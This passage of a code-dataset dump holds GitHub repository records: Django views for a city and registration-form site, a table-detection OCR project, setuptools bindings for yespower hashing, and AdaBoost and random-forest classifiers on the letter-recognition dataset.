pk=city_id)\r\n\r\n if(request.method == \"POST\"):\r\n city_form = Add_citeForm(request.POST, request.FILES, instance=city)\r\n if city_form.is_valid():\r\n city = city_form.save(commit=False)\r\n city.author = request.user.username\r\n city.save()\r\n city_form.save()\r\n return redirect(f\"/marupik/city/{city_id}\")\r\n else:\r\n city_form = Add_citeForm(instance=city)\r\n\r\n author = city.author\r\n mayor = city.mayor\r\n user = request.user\r\n image = city.image.url\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'city_form': city_form,\r\n 'author': author,\r\n 'mayor': mayor,\r\n 'user': user,\r\n 'image': image,\r\n 'city': city,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'city/edit_city_page.html', context)\r\n\r\ndef delete_city(request, city_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n city_to_delete = get_object_or_404(City, id=city_id)\r\n name = city_to_delete.author\r\n if request.method == 'POST':\r\n form = DeleteCityForm(request.POST, instance=city_to_delete)\r\n\r\n if form.is_valid():\r\n city_to_delete.delete()\r\n return redirect(f\"/marupik/cities/\")\r\n\r\n else:\r\n form = DeleteCityForm(instance=city_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return 
render(request, 'city/delete_city_page.html', context)\r\n\r\n\r\n# Форма регистрации\r\ndef show_forms(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n form = Penetration.objects.all()\r\n form = form.filter(status=False)\r\n paginator = Paginator(form, 9)\r\n page_num = request.GET.get('page')\r\n forms = paginator.get_page(page_num)\r\n\r\n user = request.user\r\n\r\n context = {\r\n 'newses': news,\r\n 'forms': forms,\r\n 'paginator': paginator,\r\n 'islogin': islogin,\r\n 'user': user,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'form/forms_page.html', context)\r\n\r\n\r\ndef show_one_form(request, form_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n form = get_object_or_404(Penetration, pk=form_id)\r\n description = form.description_yourself.split(\"\\r\\n\")\r\n\r\n if(request.method == \"POST\"):\r\n penetration_form = EditPenetrationForm(\r\n request.POST,\r\n request.FILES,\r\n instance=form\r\n )\r\n if penetration_form.is_valid():\r\n penetration_form.save()\r\n return redirect(\"/marupik/forms\")\r\n else:\r\n penetration_form = EditPenetrationForm(instance=form)\r\n\r\n user = request.user\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'description': description,\r\n 'user': user,\r\n 'penetration_form': penetration_form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'form/one_form_page.html', context)\r\n\r\n\r\ndef add_form(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if(request.method == \"POST\"):\r\n penetration_form = PenetrationForm(request.POST, request.FILES)\r\n if penetration_form.is_valid():\r\n form = penetration_form.save(commit=False)\r\n form.site_username = request.user.username\r\n form.save()\r\n penetration_form.save()\r\n return redirect(\"/marupik/forms\")\r\n\r\n else:\r\n penetration_form = PenetrationForm()\r\n\r\n role = ''\r\n if islogin:\r\n role = request.user.profile.role\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'penetration_form': penetration_form,\r\n 'role': role,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'form/add_form_page.html', context)\r\n\r\n\r\ndef edit_form(request, form_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n form = get_object_or_404(Penetration, pk=form_id)\r\n\r\n if(request.method == \"POST\"):\r\n penetration_form = PenetrationForm(\r\n request.POST,\r\n request.FILES,\r\n instance=form\r\n )\r\n if penetration_form.is_valid():\r\n form = penetration_form.save(commit=False)\r\n form.site_username = request.user.username\r\n form.save()\r\n penetration_form.save()\r\n return redirect(f\"/marupik/form/{form_id}\")\r\n else:\r\n penetration_form = PenetrationForm(instance=form)\r\n\r\n user = request.user\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'penetration_form': penetration_form,\r\n 'user': user,\r\n 'form': form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'form/edit_form_page.html', context)\r\n\r\n\r\n# Тема\r\ndef change_theme(request, theme_name):\r\n style_file = f'css/{theme_name}.css'\r\n\r\n response = redirect(\"/marupik/main\")\r\n if theme_name == 'dark' or theme_name == 'space':\r\n response.set_cookie('main_image', 'image/main3.png')\r\n else:\r\n response.set_cookie('main_image', 'image/main1.png')\r\n\r\n 
response.set_cookie('theme', style_file)\r\n return response\r\n\r\n" } ]
38
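All of the Django views in the record above call a shared `get_info(request)` helper that the record itself does not include. Below is a minimal sketch of what such a helper plausibly does, inferred from the cookies set by `change_theme()`; the `News` import, cookie defaults, and return order are assumptions, not the repo's actual code.

```python
# Hypothetical reconstruction of get_info(); every name and default here
# is an assumption inferred from how the views above consume its result.
from .models import News  # assumed model location

def get_info(request):
    islogin = request.user.is_authenticated
    # change_theme() stores these two cookies, so the helper presumably
    # reads them back with fallbacks for first-time visitors.
    header_img = request.COOKIES.get('main_image', 'image/main1.png')
    style_file = request.COOKIES.get('theme', 'css/default.css')
    news = News.objects.all()  # the views pass this to templates as 'newses'
    return islogin, header_img, style_file, news
```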
harshapriyanka/Table-Detection
https://github.com/harshapriyanka/Table-Detection
6935ed6d31c0d8f4a5a679ef766bcb67aecbbb09
0d4ea08b1bf5564fc10eaaf9e993953458d7055e
6e3c13c93251e41e2cf341db0d731be3500a9adc
refs/heads/main
2023-05-31T12:30:02.023347
2021-06-22T17:52:11
2021-06-22T17:52:11
376,112,004
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7665505409240723, "alphanum_fraction": 0.7665505409240723, "avg_line_length": 46.83333206176758, "blob_id": "0133758006b83a753585d88abc034ce78c9508dd", "content_id": "cfe3051a37cd2c7d80af82217b855456d0e0b101", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 287, "license_type": "no_license", "max_line_length": 80, "num_lines": 6, "path": "/README.md", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "# Table-Detection\nTo detect tables from a given image and save them in CSV files.\n\n* **Basic:** It has implementation for text detection.\n* **CascadeTabNet:** It has Cascade TableNet implementation for table detection.\n* **TableNet:** It has TableNet implementation for table detection.\n" }, { "alpha_fraction": 0.5604991912841797, "alphanum_fraction": 0.5680955052375793, "avg_line_length": 28.26984214782715, "blob_id": "76687cb9f4434d55c58dc1fa9bb9a9623e62ad7a", "content_id": "a2f4bc1cbe00690ae5d02c40ff1882f7c72d565c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1843, "license_type": "no_license", "max_line_length": 86, "num_lines": 63, "path": "/CascadeTabNet/roi-to-csv.py", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport pandas as pd\nimport pytesseract\nfrom math import ceil\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"OCR on Tablular Image\")\n parser.add_argument('--img-path', type=str, help='path to your image.')\n parser.add_argument('--roi-path', type=str, help='folder path to roi .npy files.')\n args = parser.parse_args()\n\n text_list_path = roi_path + '/output1.npy'\n # box_list_path = roi_path + '/output2.npy' # or '/output1.npy'\n\n text_list = np.load(text_list_path)\n # box_list = np.load(box_list_path)\n\n img = cv2.imread(img_path)\n\n text_list_sort = sorted(text_list[0], key = lambda x: (x[1], x[0]))\n\n ymin_prev = 0\n rows = []\n row = []\n row_count = []\n\n for i in text_list_sort:\n xmin, ymin, xmax, ymax = i[:-1]\n xmin = ceil(xmin)\n ymin = ceil(ymin)\n xmax = ceil(xmax)\n ymax = ceil(ymax)\n roi = img[ymin:ymax, xmin:xmax]\n config = (\"-l eng --oem 3 --psm 8\")\n text = pytesseract.image_to_string(roi, config=config)\n text_processed = [t for t in text if t not in ['\\n', '\\x0c']]\n text = ''.join(text_processed)\n\n if abs(ymin-ymin_prev)>5:\n rows.append(row)\n row_count.append(len(row))\n row = [] \n row.append(text)\n else: \n row.append(text) \n \n ymin_prev = ymin\n\n updated_text_rows = list()\n column_count = max(row_count)\n\n for row in rows:\n diff = column_count - len(row)\n for _ in range(diff):\n row.append(\" \")\n updated_text_rows.append(row)\n\n # Creating a dataframe of the generated OCR list\n arr = np.array(updated_text_rows) \n dataframe = pd.DataFrame(arr)\n dataframe.to_csv(\"output.csv\", index=False)" }, { "alpha_fraction": 0.5046728849411011, "alphanum_fraction": 0.5295950174331665, "avg_line_length": 23.769229888916016, "blob_id": "edcf05b3c5ea3291c097c22be218fd0d67615d73", "content_id": "87b2646674100f4eb2c496660a427b91f8291e22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 321, "license_type": "no_license", "max_line_length": 41, "num_lines": 13, "path": "/CascadeTabNet/detection.py", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "import numpy 
as np\n\nscore_thr = 0.85\n\n# 'result' is produced by the CascadeTabNet demo notebook's inference step\nfor i, arr in enumerate(result[0]):\n bboxes = []\n if arr.shape[1] == 5 and len(arr)!=0:\n print(len(arr))\n scores = arr[:, -1]\n inds = scores > score_thr\n bboxes.append(arr[inds, :])\n path = 'output'+str(i)+'.npy'\n np.save(path, bboxes)" }, { "alpha_fraction": 0.6742933988571167, "alphanum_fraction": 0.675639271736145, "avg_line_length": 16, "blob_id": "341e41d95b191e3bc653a5d7d7d596df8da4e012", "content_id": "6feb0490a11160f7ba5b4bf3bcd026d8f904e497", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 997, "license_type": "no_license", "max_line_length": 72, "num_lines": 58, "path": "/Basic/Readme.md", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "# Tabular Image to CSV:-\n\n## Prerequisites :-\n\n* [OpenCV]()\n* [pytesseract]()\n* [PIL]()\n* [Pandas]()\n* [Imutils]()\n\n\n\n### Installing Requirements:\n\nInstall the requirements from requirements.txt:\n```\npip install -r requirements.txt\n```\n\nTo install `pytesseract`:\n```\napt install tesseract-ocr\napt install libtesseract-dev\npip install pytesseract\n```\n\n## Project Structure:-\n\n* [images]() :- This folder contains images to be used for OCR.\n* [output_csv]() :- It contains the result of the tabular image in a CSV file.\n* [processed_image]() :- Contains images generated while pre-processing.\n* [requirements.txt]() :- Requirement file.\n* [image-to-csv.py]() :- Code file.\n\n\n\n\n## Python command to run script\n\n```\npython3 image-to-csv.py --img-path images/patient.png\n```\n\n### Original:-\n\n![Screenshot](images/patient.png)\n\n### Threshold:-\n\n![Screenshot](processed_image/threshold.png)\n\n### Dilated:-\n\n![Screenshot](processed_image/dilation.png)\n\n### ROI:-\n\n![Screenshot](processed_image/show_box.png)\n\n\n\n\n\n\n \n" }, { "alpha_fraction": 0.7065727710723877, "alphanum_fraction": 0.707355260848999, "avg_line_length": 23.88679313659668, "blob_id": "6a75267fdf3110356647c277fba088b76ecf6952", "content_id": "f664f817a54f2b186f8171962464ced7a58d8c8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1278, "license_type": "no_license", "max_line_length": 191, "num_lines": 53, "path": "/CascadeTabNet/Readme.md", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "# Tabular Image to CSV:-\n\n## Prerequisites :-\n\n* [OpenCV]()\n* [pytesseract]()\n* [PIL]()\n* [Pandas]()\n* [Imutils]()\n\n\n\n### Installing Requirements:\n\nInstall the requirements from requirements.txt:\n```\npip install -r requirements.txt\n```\n\nTo install `pytesseract`:\n```\napt install tesseract-ocr\napt install libtesseract-dev\npip install pytesseract\n```\n\n## Project Structure:-\n\n* [images]() :- This folder contains images to be used for OCR.\n* [output_csv]() :- It contains the result of the tabular image in a CSV file.\n* [detections]() :- Images with table detections (i.e. 
image with bounding boxes and their co-ordinates saved as .npy files) using CascadeTabNet.\n* [requirements.txt]() :- Requirement file.\n* [roi-to-csv.py]() :- Code file.\n\n\n\n## Python command to run script\n\nTo get ROIs and an image with detections, add the **detection.py** code to the [CascadeTabNet Demo](https://github.com/DevashishPrasad/CascadeTabNet/blob/master/Demo/Cascade_TabNet_Demo.ipynb) notebook.\n\nRunning this updated notebook gives .npy files with ROIs like those in the **detections** folder.\n\n```\npython3 roi-to-csv.py --img-path <path-to-desired-image> --roi-path <path-to-folder-containing-npy-files>\n```\n\n### Original:-\n\n![Screenshot](images/patient.png)\n\n### ROI:-\n\n![Screenshot](detections/patient/patient.png)\n\n\n\n\n\n\n \n\n" }, { "alpha_fraction": 0.4337349534034729, "alphanum_fraction": 0.650602400302887, "avg_line_length": 15.199999809265137, "blob_id": "25ed24355161266f657d2cc94065fe2f430340c1", "content_id": "cbd4584b480a05f9e9598f71993dccbdfae10cfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 83, "license_type": "no_license", "max_line_length": 23, "num_lines": 5, "path": "/Basic/requirements.txt", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "imutils==0.5.3\nnumpy==1.19.0\nopencv-python==4.2.0.34\npandas==1.0.5\nPillow==7.1.2\n\n\n" }, { "alpha_fraction": 0.5763644576072693, "alphanum_fraction": 0.6027728915214539, "avg_line_length": 30.55555534362793, "blob_id": "43ae08951c93484e5143666ce9492c7f18d6dac9", "content_id": "429c752d125c166ea1ee10a8c99db38f892553c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4544, "license_type": "no_license", "max_line_length": 97, "num_lines": 144, "path": "/Basic/image-to-csv.py", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport pandas as pd\nimport random\nfrom imutils import contours\nimport argparse\nimport pytesseract\nfrom math import ceil\n\ndef preprocessing_non_tabular(path):\n img = cv2.imread(path)\n\n # ----Grayscaling Image----\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # --- performing Otsu threshold ---\n ret, thresh1 = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY_INV)\n cv2.imwrite(\"processed_image/threshold.png\", thresh1)\n # cv2.imshow('thresh1', thresh1)\n # cv2.waitKey(0)\n\n # ----Image dilation----\n rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 3))\n dilation = cv2.dilate(thresh1, rect_kernel, iterations=1)\n cv2.imwrite(\"processed_image/dilation.png\", dilation)\n # cv2.imshow('dilation', dilation)\n # cv2.waitKey(0)\n\n # ---Finding contours ---\n contours, hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n return img, contours[::-1]\n\n\ndef preprocessing_tabular(path):\n # Load image\n img = cv2.imread(path)\n # img = cv.GaussianBlur(img,(5,5),0)\n\n # ----Grayscaling Image----\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # --- performing Otsu threshold ---\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n # thresh = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_GAUSSIAN_C,cv.THRESH_BINARY,11,2)\n\n # Remove text characters with morph open and contour filtering\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n opening = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel, iterations=1)\n\n cnts = cv2.findContours(opening, cv2.RETR_TREE, 
cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n for c in cnts:\n area = cv2.contourArea(c)\n if area < 500:\n cv2.drawContours(opening, [c], -1, (0, 0, 0), -1)\n\n # Repair table lines, sort contours, and extract ROI\n close = 255 - cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel, iterations=1)\n\n cnts = cv2.findContours(close, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n cnts, _ = contours.sort_contours(cnts, method=\"top-to-bottom\")\n return img, cnts\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"OCR on Tabular Image\")\n parser.add_argument('--img-path', type=str, help='path to your image.')\n args = parser.parse_args()\n\n # ---Image_Path---\n path = args.img_path\n # path = \"images/patient.png\"\n\n img, cnts = preprocessing_non_tabular(path)\n if len(cnts) < 8:\n img, cnts = preprocessing_tabular(path)\n\n \n dummy_image = img.copy()\n\n bboxes = []\n\n for idx, cnt in enumerate(cnts):\n x, y, w, h = cv2.boundingRect(cnt)\n bboxes.append([ceil(x), ceil(y), ceil(x+w), ceil(y+h)])\n\n bboxes_sort = sorted(bboxes, key=lambda x:(x[1], x[0]))\n\n ymin_prev = 0\n rows = []\n single_row = []\n row_count = []\n\n for i in bboxes_sort:\n xmin, ymin, xmax, ymax = i\n roi = img[ymin:ymax, xmin:xmax]\n config = (\"-l eng --oem 3 --psm 8\")\n text = pytesseract.image_to_string(roi, config=config)\n # text_processed = [t for t in text if t not in ['\\\n', '\\\x0c', '<<', '-', '@', '(', ')']]\n text_processed = [t for t in text if t.isalnum() or t == ' ' or t == ':' \n or t == '.' or t == '/' or t == '=' or t == '&']\n text = ''.join(text_processed)\n\n # print(text)\n\n if abs(ymin-ymin_prev)>10:\n rows.append(single_row)\n row_count.append(len(single_row))\n single_row = [] \n single_row.append(text)\n else: \n single_row.append(text) \n\n ymin_prev = ymin\n\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n\n # Drawing box\n cv2.rectangle(dummy_image, (xmin, ymin), (xmax, ymax), (b, g, r), 2)\n \n cv2.imwrite(\"processed_image/show_box.png\", dummy_image)\n # cv2.imshow('final', dummy_image)\n # cv2.waitKey(0)\n\n print(row_count)\n\n updated_text_rows = list()\n columns = max(row_count)\n\n print(columns)\n\n for row in rows:\n diff = columns - len(row)\n for _ in range(diff):\n row.append(\" \")\n updated_text_rows.append(row)\n\n # Creating a dataframe of the generated OCR list\n arr = np.array(updated_text_rows) \n dataframe = pd.DataFrame(arr)\n dataframe.to_csv(\"output_csv/output.csv\", index=False)\n" }, { "alpha_fraction": 0.7440711259841919, "alphanum_fraction": 0.757905125617981, "avg_line_length": 28.764705657958984, "blob_id": "d10a62710d7fb96fb0c16e62a4083d279396c6d5", "content_id": "52e435796fa8570ede1fb21c6a5753fdce34d26d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1012, "license_type": "no_license", "max_line_length": 221, "num_lines": 34, "path": "/TableNet/README.md", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "# TableNet\n\nThis repository consists of an extension of [TableNet](https://arxiv.org/abs/2001.01469) i.e. 
base model VGG is replaced by **ResNet18**.\n\nTo train or predict, you should first install the requirements by running the following code:\n\n```bash\npip install -r requirements.txt\n```\nTo install `pytesseract`:\n```\napt install tesseract-ocr\napt install libtesseract-dev\npip install pytesseract\n```\n\nTraining only requires the `train.py` file, which can be configured as desired.\n\nFor prediction, you can use the pre-trained weights already available, which can be downloaded from the following link: [TableNet Weights](https://drive.google.com/drive/folders/1LvPnSxnDrl0dywRGAxbOD6hX-jmvw_qb?usp=sharing)\n\nAt the same link, you will find `data` along with **Annotations**.\n\n```bash\n python predict.py --model_weights='<weights path>' --image_path='<image path>'\n```\n\nor simply:\n```bash\n python predict.py\n```\n\nto predict with the default image.\n\nReference: [OCR_TableNet](https://github.com/tomassosorio/OCR_tablenet)\n" } ]
8
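Every script in the record above reduces to the same core step: crop each detected bounding box out of the page image and hand the crop to Tesseract in single-word mode. A self-contained sketch of that step follows; the file name and box coordinates are placeholders.

```python
# Crop-and-OCR step shared by roi-to-csv.py and image-to-csv.py above.
import cv2
import pytesseract

img = cv2.imread("images/patient.png")  # placeholder path
assert img is not None, "image not found"

xmin, ymin, xmax, ymax = 10, 20, 200, 60  # placeholder cell box
roi = img[ymin:ymax, xmin:xmax]
# "--psm 8" tells Tesseract to treat the crop as a single word,
# matching the config string used in the repo's scripts.
text = pytesseract.image_to_string(roi, config="-l eng --oem 3 --psm 8")
print(text.strip())
```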
mraksoll4/bitweb_yespower_python3
https://github.com/mraksoll4/bitweb_yespower_python3
1ebb3249249e45d1399486c8004d3e6a5ae8ace2
23b184a38c1686d72485a9534b26a8fbc1e22583
6a030a00b55e9db911da58c31d7214a8baddc311
refs/heads/main
2023-05-04T12:02:58.959290
2021-07-24T21:54:29
2021-07-24T21:54:29
370,996,894
0
0
null
2021-05-26T10:38:51
2021-05-24T08:39:07
2021-05-23T21:47:33
null
[ { "alpha_fraction": 0.4423791766166687, "alphanum_fraction": 0.4560099244117737, "avg_line_length": 43.83333206176758, "blob_id": "5c6b643d64f65d1fcbc31ba5e9b63f7f0e110c03", "content_id": "e4e2a3ef2eca22680326595449e6a54b4f461176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 807, "license_type": "no_license", "max_line_length": 97, "num_lines": 18, "path": "/setup.py", "repo_name": "mraksoll4/bitweb_yespower_python3", "src_encoding": "UTF-8", "text": "from setuptools import setup, Extension\n\nltfn_yespower_module = Extension('ltfn_yespower',\n sources = ['yespower-module.c',\n 'yespower.c',\n 'yespower-opt.c',\n 'sha256.c'\n ],\n extra_compile_args=['-O2', '-funroll-loops', '-fomit-frame-pointer'],\n include_dirs=['.'])\n\nsetup (name = 'ltfn_yespower',\n version = '1.0.2',\n author_email = '[email protected]',\n author = 'mraksoll',\n url = 'https://github.com/mraksoll4/ltfn_yespower_python3',\n description = 'Bindings for yespower-1.0 proof of work used by ltfn',\n ext_modules = [ltfn_yespower_module])\n" } ]
1
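The record above ships only the build script, so the module's Python-level API is not visible here. A hedged usage sketch: the build command is standard setuptools, while `getPoWHash()` is an assumption based on the entry point that comparable yespower miner bindings expose.

```python
# Build the extension first (standard setuptools, run from the repo root):
#   python setup.py build_ext --inplace
import ltfn_yespower

# ASSUMPTION: getPoWHash(data) -> 32-byte digest is the conventional
# entry point of yespower bindings; yespower-module.c is not in this
# record, so the real name may differ.
header = bytes(80)  # placeholder 80-byte block header
print(ltfn_yespower.getPoWHash(header).hex())
```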
wenjunpku/Adaboost
https://github.com/wenjunpku/Adaboost
87244bcde4a697c249647f58374f481fe6bb6e4f
0ff2b02507e402826ddbaa1570b25934ff9d95fc
5b41643a32e36274e5beacb0e22e7c2f97fa3f92
refs/heads/master
2020-05-27T04:49:43.346100
2017-02-20T06:37:59
2017-02-20T06:37:59
82,524,961
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7125119566917419, "alphanum_fraction": 0.7258834838867188, "avg_line_length": 39.269229888916016, "blob_id": "a9dd6272d0be09230f33fe16bc92356aafd08b4a", "content_id": "9f9808434d9c77f0777d7eb2721948dae1729965", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1047, "license_type": "no_license", "max_line_length": 122, "num_lines": 26, "path": "/src/adaboost3.py", "repo_name": "wenjunpku/Adaboost", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy import *\nimport pandas as pd\nfrom sklearn.metrics import classification_report\nfrom sklearn import datasets\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.multiclass import OneVsOneClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\n\nTRAIN = 18000\nfilename = \"../data/letter-recognition.data\"\ncol_name = ['lettr','x-box','y-box','width','high','onpix',\\\n'x-bar','y-bar', 'x2bar','y2bar','xybar','x2ybr','xy2br','x-ege','xegvy','y-ege','yegvx']\nprint len(col_name)\ndata = pd.read_csv(filename, names = col_name)\ndata_X = np.array(data.ix[:,'x-box':],dtype='float')\nformat = lambda X: ord(X) - ord('A')\ndata_Y = np.array(data['lettr'].map(format),dtype='float')\ntrain_X = data_X[:TRAIN]\ntrain_Y = data_Y[:TRAIN]\ntest_X = data_X[TRAIN:]\ntest_Y = data_Y[TRAIN:]\nprint train_X.shape, train_Y.shape, test_X.shape, test_Y.shape\n#OVR\nPre_Y = OneVsRestClassifier(AdaBoostClassifier(n_estimators=100, learning_rate=0.5)).fit(train_X, train_Y).predict(test_X)\nprint (classification_report(test_Y,Pre_Y))\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 47, "blob_id": "869bff40bdc8a28effd585cc39dfa5883682cc68", "content_id": "c5cc80de3447566f17c34f3acfee7b4015737c2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 48, "license_type": "no_license", "max_line_length": 47, "num_lines": 1, "path": "/README.md", "repo_name": "wenjunpku/Adaboost", "src_encoding": "UTF-8", "text": "# Adaboost practice for machine learning course\n" }, { "alpha_fraction": 0.7044830918312073, "alphanum_fraction": 0.7163769602775574, "avg_line_length": 36.68965530395508, "blob_id": "14ac1a2da7902084f6d8421b6b16c6731ae3e2e8", "content_id": "7b390405db6358a8b2c194c719b8929779190d7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1093, "license_type": "no_license", "max_line_length": 94, "num_lines": 29, "path": "/src/test.py", "repo_name": "wenjunpku/Adaboost", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy import *\nimport pandas as pd\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import RandomForestClassifier\n\nTRAIN = 16000\nfilename = \"../data/letter-recognition.data\"\ncol_name = ['lettr','x-box','y-box','width','high','onpix',\\\n'x-bar','y-bar', 'x2bar','y2bar','xybar','x2ybr','xy2br','x-ege','xegvy','y-ege','yegvx']\nprint len(col_name)\ndata = pd.read_csv(filename, names = col_name)\ndata_X = np.array(data.ix[:,'x-box':],dtype='float')\nformat = lambda X: ord(X) - ord('A')\ndata_Y = np.array(data['lettr'].map(format),dtype='float')\ntrain_X = data_X[:TRAIN]\ntrain_Y = data_Y[:TRAIN]\ntest_X = data_X[TRAIN:]\ntest_Y = data_Y[TRAIN:]\nprint train_X.shape, train_Y.shape, test_X.shape, test_Y.shape\n\n#Prd_Y = 
OneVsRestClassifier(LinearSVC(random_state=0)).fit(train_X, train_Y).predict(test_X)\nclf = RandomForestClassifier(n_estimators=100)\nclf = clf.fit(train_X, train_Y)\nPrd_Y = clf.predict(test_X)\nprint Prd_Y\nprint (classification_report(test_Y,Prd_Y))\n" }, { "alpha_fraction": 0.6219110488891602, "alphanum_fraction": 0.6355024576187134, "avg_line_length": 40.86206817626953, "blob_id": "cb4fca8661656e221a8874ab7b27f81c545a12cc", "content_id": "b3e0f802a5b9c4c08ff2b7a91fc5d311853406f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5258, "license_type": "no_license", "max_line_length": 139, "num_lines": 116, "path": "/src/adaboost2.py", "repo_name": "wenjunpku/Adaboost", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom numpy import *\nimport pandas as pd\nfrom sklearn.metrics import classification_report\n\nTRAIN = 16000\nfilename = \"../data/letter-recognition.data\"\ncol_name = ['lettr','x-box','y-box','width','high','onpix',\\\n'x-bar','y-bar', 'x2bar','y2bar','xybar','x2ybr','xy2br','x-ege','xegvy','y-ege','yegvx']\nprint len(col_name)\ndata = pd.read_csv(filename, names = col_name)\ndata_X = np.array(data.ix[:,'x-box':],dtype='float')\nformat = lambda X: ord(X) - ord('A')\ndata_Y = np.array(data['lettr'].map(format),dtype='float')\ntrain_X = data_X[:TRAIN]\ntrain_Y = data_Y[:TRAIN]\ntest_X = data_X[TRAIN:]\ntest_Y = data_Y[TRAIN:]\nprint train_X.shape, train_Y.shape, test_X.shape, test_Y.shape\n\ntrain_Y[train_Y != 0.0] = 1.0\ntrain_Y[train_Y == 0.0] = -1.0\ntest_Y[test_Y != 0.0] = 1.0\ntest_Y[test_Y == 0.0] = -1.0\n\n#构建一个简单的单层决策树,作为弱分类器\n#D作为每个样本的权重,作为最后计算error的时候多项式乘积的作用\n#三层循环\n#第一层循环,对特征中的每一个特征进行循环,选出单层决策树的划分特征\n#对步长进行循环,选出阈值\n#对大于,小于进行切换\n#特征:dimen,分类的阈值是 threshVal,分类对应的大小值是threshIneq\ndef stumpClassify(dataMatrix,dimen,threshVal,threshIneq):#just classify the data\n retArray = ones((shape(dataMatrix)[0],1))\n if threshIneq == 'lt':\n retArray[dataMatrix[:,dimen] <= threshVal] = -1.0\n else:\n retArray[dataMatrix[:,dimen] > threshVal] = -1.0\n return retArray\n\ndef buildStump(dataArr,classLabels,D):\n dataMatrix = mat(dataArr); labelMat = mat(classLabels).T\n m,n = shape(dataMatrix)\n numSteps = 10.0; bestStump = {}; bestClasEst = mat(zeros((m,1))) #numSteps作为迭代这个单层决策树的步长\n minError = inf #init error sum, to +infinity\n for i in range(n):#loop over all dimensions\n rangeMin = dataMatrix[:,i].min(); rangeMax = dataMatrix[:,i].max();#第i个特征值的最大最小值\n stepSize = (rangeMax-rangeMin)/numSteps\n for j in range(-1,int(numSteps)+1):#loop over all range in current dimension\n for inequal in ['lt', 'gt']: #go over less than and greater than\n threshVal = (rangeMin + float(j) * stepSize)\n predictedVals = stumpClassify(dataMatrix,i,threshVal,inequal)#call stump classify with i, j, lessThan\n errArr = mat(ones((m,1)))\n errArr[predictedVals == labelMat] = 0\n weightedError = D.T*errArr #calc total error multiplied by D\n #print \"split: dim %d, thresh %.2f, thresh ineqal: %s, 